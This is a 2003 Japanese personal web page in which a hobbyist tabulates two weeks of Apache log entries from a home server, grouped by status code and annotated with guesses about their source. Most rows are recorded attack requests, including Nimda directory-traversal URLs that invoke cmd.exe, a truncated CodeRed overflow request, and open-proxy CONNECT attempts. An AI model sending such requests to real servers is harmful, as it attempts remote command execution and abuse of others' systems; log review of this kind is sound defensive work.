楽しみながら攻めつづける！　「山下の部屋」Apacheのログウォッチ　2003年7月1日～2003年7月15日

楽しみながら攻めつづける！
－HONDA '88NSR250R & '94NSR250R SE－

　
山下の部屋　自宅サーバのログを見てみよう

Apacheのログウォッチ　2003年7月1日～2003年7月15日
　
　自宅Webサーバのログ集計です。もう見飽きた感がある？WinサーバーのIISセキュリティを突いた不正アクセスがいつものように多いです。
　
　今回は新たにGET /NULL.IDA?CCC・・・(63000文字）・・・と言うログが残ってました。WinNTAutoAttackという新種の攻撃らしいのですが、これもWindowsサーバをねらったもののようです。自宅サーバはLinuxだから、問題は無さそうですが・・・ローカルPCでログを集計中にプログラムが落ちてしまいます（汗）。
その内に、Apacheの設定を変更してエラーをアクセスログへ出力しないようにするか？もしくは別に不正アクセス用のログへ出力するようにしようか？と考えてます・・・。
　
400：Bad Request

Method	URL	Query	回数	理由
GET	/NULL.IDA	CCC・・・（途中略）・・・\xc5cmd.exe$	16	WINNTAutoAttack V2.5というアタックツールからの攻撃らしい
GET	/scripts/..%%35%63../winnt/system32/cmd.exe	/c+dir	16	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%%35c./winnt/system32/cmd.exe	/c+dir	15	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ

　
404：Not Found

Method	URL	Query	回数	理由
GET	/default.ida	XXXX・・・（途中略）・・・%u00=a	281	「CodeRed」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/_vti_bin/owssvr.dll	UL=1&ACT=4 &BUILD=2614 &STRMVER=4 &CAPREQ=0	28	IE+MS Office環境でWebディスカッション機能がOnだと、リクエストを出すらしい
GET	/MSOffice/cltreq.asp	UL=1&ACT=4 &BUILD=2614 &STRMVER=4 &CAPREQ=0	28	IE+MS Office環境でWebディスカッション機能がOnだと、リクエストを出すらしい
GET	/scripts/..%c0%af../winnt/system32/cmd.exe	/c+dir	16	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/root.exe	/c+dir	16	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe	/c+dir	15	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/c/winnt/system32/cmd.exe	/c+dir	15	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe	/c+dir	15	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%25%35%63../winnt/system32/cmd.exe	/c+dir	15	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%252f../winnt/system32/cmd.exe	/c+dir	15	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%c0%2f../winnt/system32/cmd.exe	/c+dir	15	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%c1%1c../winnt/system32/cmd.exe	/c+dir	15	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%c1%9c../winnt/system32/cmd.exe	/c+dir	15	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe	/c+dir	14	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/d/winnt/system32/cmd.exe	/c+dir	14	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/MSADC/root.exe	/c+dir	14	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%255c../winnt/system32/cmd.exe	/c+dir	14	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/cgi-bin	idxname=zive	1	？
GET	/link/mc21.html	-	1	？？まだ作ってないし（汗）
GET	/mailto:a_yamasita@geocities.co.jp	-	1	？
GET	/msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe	/c+dir	1	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/NULL.printer	-	1	WINNTAutoAttack V2.5というアタックツールからの攻撃らしい
GET	/scripts/..%255c%255c../winnt/system32/cmd.exe	/c+dir	1	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ

　
405：Method Not Allowed

Method	URL	Query	回数	理由
POST	http://67.202.109.51:25/	-	1	POST？
CONNECT	sbcmail1.prodigy.net:25	-	1	25番ポートなので、他のmaiｌサーバに接続しようとしてるのかな？
CONNECT	65.54.254.151:25	-	1	25番ポートなので、他のmaiｌサーバに接続しようとしてるのかな？
CONNECT	207.46.133.140:21	-	1	21番ポートなので、他のftpサーバに接続しようとしてるのかな？

　
501：Not Implemented

Method	URL	Query	回数	理由
\x04\x01		-	1	AN HTTPDのセキュリティホールをつく攻撃みたい
\x05\x01		-	1	AN HTTPDのセキュリティホールをつく攻撃みたい
SEARCH	/	-	1	？

有名くじ売り場であなたも宝くじＧＥＴ